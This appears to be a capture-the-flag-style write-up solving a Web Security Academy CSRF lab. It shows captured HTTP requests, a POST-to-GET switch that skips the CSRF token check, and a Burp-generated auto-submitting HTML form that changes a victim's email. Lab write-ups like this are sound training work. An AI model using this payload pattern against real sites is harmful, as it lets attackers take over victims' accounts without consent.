Skip to content

chojnowski.it

CSRF where token validation depends on request met

CSRF where token validation depends on request met

CSRF where token validation depends on request method¶

Solution¶

L: wiener
P: peter

Sent a basic request (POST)¶

POST /my-account/change-email HTTP/2
Host: 0a2900550308704f82ea3d9600390097.web-security-academy.net
Cookie: session=zdV1yOAXibqCKjxF9Ny8XqXhAvXrLZV1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://0a2900550308704f82ea3d9600390097.web-security-academy.net
Referer: https://0a2900550308704f82ea3d9600390097.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

email=wiener1%40normal-user.net&csrf=bLfChNGeedBjjtSIUkKIOOZGf8fYcqgk

Edit request (GET)¶

GET /my-account/change-email?email=wiener2%40normal-user.net HTTP/2
Host: 0a2900550308704f82ea3d9600390097.web-security-academy.net
Cookie: session=zdV1yOAXibqCKjxF9Ny8XqXhAvXrLZV1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://0a2900550308704f82ea3d9600390097.web-security-academy.net
Referer: https://0a2900550308704f82ea3d9600390097.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

## Generate CSRF PoC

right-click on the request and select Engagement tools / Generate CSRF PoC

CSRF payload¶

Copy and paste payload to Body section (Exploit server) and click "Store" and "View explit" and "Delivery exploit to victim"
---
Payload
___
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a2900550308704f82ea3d9600390097.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="wiener3&#64;fake&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>